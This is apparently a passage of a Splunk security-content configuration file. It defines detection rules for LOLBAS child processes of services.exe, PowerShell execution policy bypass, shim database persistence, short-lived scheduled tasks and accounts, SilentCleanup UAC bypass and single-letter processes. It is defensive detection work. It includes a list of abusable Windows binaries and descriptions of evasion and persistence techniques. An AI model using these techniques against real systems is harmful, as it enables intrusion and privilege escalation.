action.escu.analytic_story = ["Active Directory Lateral Movement", "Living Off The Land", "Qakbot", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = Services.exe spawned a LOLBAS process on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Services LOLBAS Execution Process Spawn - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement", "Living Off The Land", "Qakbot", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543", "T1543.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `services.exe` spawning a LOLBAS execution process. When adversaries execute code on remote endpoints abusing the Service Control Manager and creating a remote malicious service, the executed command is spawned as a child process of `services.exe`. The LOLBAS project documents Windows native binaries that can be abused by threat actors to perform tasks like executing malicious code. Looking for child processes of services.exe that are part of the LOLBAS project can help defenders identify lateral movement activity. action.notable.param.rule_title = Services LOLBAS Execution Process Spawn action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name=services.exe) (Processes.process_name IN ("Regsvcs.exe", "Ftp.exe", "OfflineScannerShell.exe", "Rasautou.exe", "Schtasks.exe", "Xwizard.exe", "Dllhost.exe", "Pnputil.exe", "Atbroker.exe", "Pcwrun.exe", "Ttdinject.exe","Mshta.exe", "Bitsadmin.exe", "Certoc.exe", "Ieexec.exe", "Microsoft.Workflow.Compiler.exe", "Runscripthelper.exe", "Forfiles.exe", "Msbuild.exe", "Register-cimprovider.exe", "Tttracer.exe", "Ie4uinit.exe", "Bash.exe", "Hh.exe", "SettingSyncHost.exe", "Cmstp.exe", "Mmc.exe", "Stordiag.exe", "Scriptrunner.exe", "Odbcconf.exe", "Extexport.exe", "Msdt.exe", "WorkFolders.exe", "Diskshadow.exe", "Mavinject.exe", "Regasm.exe", "Gpscript.exe", "Rundll32.exe", "Regsvr32.exe", "Msiexec.exe", "Wuauclt.exe", "Presentationhost.exe", "Wmic.exe", "Runonce.exe", "Syncappvpublishingserver.exe", "Verclsid.exe", "Infdefaultinstall.exe", "Explorer.exe", "Installutil.exe", "Netsh.exe", "Wab.exe", "Dnscmd.exe", "At.exe", "Pcalua.exe", "Msconfig.exe")) by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `services_lolbas_execution_process_spawn_filter` [ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrators may attempt to change the default execution policy on a system for a variety of reasons. However, setting the policy to "unrestricted" or "bypass" as this search is designed to identify, would be unusual. Hits should be reviewed and investigated as appropriate. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["HAFNIUM Group", "Hermetic Wiper", "Credential Dumping", "Malicious PowerShell", "Data Destruction", "DarkGate Malware"] action.risk = 1 action.risk.param._risk_message = A registry modification in $registry_path$ with reg key $registry_key_name$ and reg value $registry_value_name$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 48}, {"risk_object_field": "registry_path", "risk_object_type": "other", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Set Default PowerShell Execution Policy To Unrestricted or Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["HAFNIUM Group", "Hermetic Wiper", "Credential Dumping", "Malicious PowerShell", "Data Destruction", "DarkGate Malware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Monitor for changes of the ExecutionPolicy in the registry to the values "unrestricted" or "bypass," which allows the execution of malicious scripts. action.notable.param.rule_title = Set Default PowerShell Execution Policy To Unrestricted or Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=*Software\\Microsoft\\Powershell\\1\\ShellIds\\Microsoft.PowerShell* Registry.registry_value_name=ExecutionPolicy (Registry.registry_value_data=Unrestricted OR Registry.registry_value_data=Bypass)) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `set_default_powershell_execution_policy_to_unrestricted_or_bypass_filter` [ESCU - Shim Database File Creation - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint file-system data model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data. action.escu.known_false_positives = Because legitimate shim files are created and used all the time, this event, in itself, is not suspicious. However, if there are other correlating events, it may warrant further investigation. action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Shim Database File Creation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A process that possibly write shim database in $file_path$ in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "file_path", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Shim Database File Creation - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for shim database files being written to default directories. The sdbinst.exe application is used to install shim database files (.sdb). According to Microsoft, a shim is a small library that transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.notable.param.rule_title = Shim Database File Creation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count values(Filesystem.action) values(Filesystem.file_hash) as file_hash values(Filesystem.file_path) as file_path min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path=*Windows\\AppPatch\\Custom* by Filesystem.file_name Filesystem.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` |`drop_dm_object_name(Filesystem)` | `shim_database_file_creation_filter` [ESCU - Shim Database Installation With Suspicious Parameters - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = None identified action.escu.creation_date = 2020-11-23 action.escu.modification_date = 2020-11-23 action.escu.confidence = high action.escu.full_search_name = ESCU - Shim Database Installation With Suspicious Parameters - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = A process $process_name$ that possible create a shim db silently in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Shim Database Installation With Suspicious Parameters - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1546.011", "T1546"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects the process execution and arguments required to silently create a shim database. The sdbinst.exe application is used to install shim database files (.sdb). A shim is a small library which transparently intercepts an API, changes the parameters passed, handles the operation itself, or redirects the operation elsewhere. action.notable.param.rule_title = Shim Database Installation With Suspicious Parameters action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sdbinst.exe by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `shim_database_installation_with_suspicious_parameters_filter` [ESCU - Short Lived Scheduled Task - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Windows Security Event Logs with 4698 EventCode enabled. The Windows TA is also required. action.escu.known_false_positives = Although uncommon, legitimate applications may create and delete a Scheduled Task within 30 seconds. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Short Lived Scheduled Task - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["CISA AA23-347A", "Active Directory Lateral Movement", "Scheduled Tasks", "CISA AA22-257A"] action.risk = 1 action.risk.param._risk_message = A windows scheduled task was created and deleted in 30 seconds on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 81}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Short Lived Scheduled Task - Rule action.correlationsearch.annotations = {"analytic_story": ["CISA AA23-347A", "Active Directory Lateral Movement", "Scheduled Tasks", "CISA AA22-257A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.005"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic utilizes Windows Security EventCode 4698, "A scheduled task was created," and EventCode 4699, "A scheduled task was deleted," to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\ To implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\ It's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\ Identifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads. action.notable.param.rule_title = Short Lived Scheduled Task action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4698 OR EventCode=4699 | xmlkv Message | transaction Task_Name startswith=(EventCode=4698) endswith=(EventCode=4699) | eval short_lived=case((duration<30),"TRUE") | search short_lived = TRUE | rename ComputerName as dest| table _time, dest, Account_Name, Command, Task_Name, short_lived | `short_lived_scheduled_task_filter` [ESCU - Short Lived Windows Accounts - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = ["Change"] action.escu.eli5 = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. action.escu.how_to_implement = This search requires you to have enabled your Group Management Audit Logs in your Local Windows Security Policy and be ingesting those logs. More information on how to enable them can be found here: http://whatevernetworks.com/auditing-group-membership-changes-in-active-directory/ action.escu.known_false_positives = It is possible that an administrator created and deleted an account in a short time period. Verifying activity with an administrator is advised. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - Short Lived Windows Accounts - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A user account created or delete shortly in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Short Lived Windows Accounts - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects the creation and deletion of accounts in a short time period to identify potential threats earlier and take appropriate actions to mitigate the risks. Helps prevent or minimize the potential damage caused by unauthorized access or malicious activities within the environment. This detection is made by a Splunk query that searches for events with the result IDs 4720 and 4726 in the "Change" data model. The query then groups the results by time, user, and destination. The result is filtered to only include events with the specified result IDs. The "transaction" command is used to group events that occur within a specified time span and have the same user but are not connected. Finally, the relevant information such as the first and last time of the event, the count, user, destination, and result ID are displayed in a table. This detection is important because it suggests that an attacker is attempting to create and delete accounts rapidly, potentially to cover their tracks or gain unauthorized access. The impact of such an attack can include unauthorized access to sensitive data, privilege escalation, or the ability to carry out further malicious activities within the environment. Next steps include investigating the events flagged by the analytic, review the account creation and deletion activities, and analyze any associated logs or artifacts to determine the intent and impact of the attack. action.notable.param.rule_title = Short Lived Windows Accounts action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` values(All_Changes.result_id) as result_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Change where All_Changes.result_id=4720 OR All_Changes.result_id=4726 by _time span=4h All_Changes.user All_Changes.dest | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `drop_dm_object_name("All_Changes")` | search result_id = 4720 result_id=4726 | transaction user connected=false maxspan=240m | table firstTime lastTime count user dest result_id | `short_lived_windows_accounts_filter` [ESCU - SilentCleanup UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = unknown action.escu.creation_date = 2022-11-14 action.escu.modification_date = 2022-11-14 action.escu.confidence = high action.escu.full_search_name = ESCU - SilentCleanup UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"] action.risk = 1 action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible payload path $registry_value_name$ in $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - SilentCleanup UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search is to detect a suspicious modification of registry that may related to UAC bypassed. This registry will be trigger once the attacker abuse the silentcleanup task schedule to gain high privilege execution that will bypass User control account. action.notable.param.rule_title = SilentCleanup UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path= "*\\Environment\\windir" Registry.registry_value_data = "*.exe*") BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `silentcleanup_uac_bypass_filter` [ESCU - Single Letter Process On Endpoint - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as data theft or ransomware attacks. False positives might occur since there might be legitimate uses of single-letter process names in your environment. Next steps include reviewing the process details and investigating any suspicious activity upon triage. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Single-letter executables are not always malicious. Investigate this activity with your normal incident-response process. action.escu.creation_date = 2020-12-08 action.escu.modification_date = 2020-12-08 action.escu.confidence = high action.escu.full_search_name = ESCU - Single Letter Process On Endpoint - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["DHS Report TA18-074A"] action.risk = 1 action.risk.param._risk_message = A suspicious process $process_name$ with single letter in host $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 63}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Single Letter Process On Endpoint - Rule action.correlationsearch.annotations = {"analytic_story": ["DHS Report TA18-074A"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204", "T1204.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a behavior where a process name consists only of a single letter that helps to detect potential threats earlier and mitigate the risks. This detection is important because it indicates the presence of malware or an attacker attempting to evade detection by using a process name that is difficult to identify or track so that he can carry out malicious activities such as 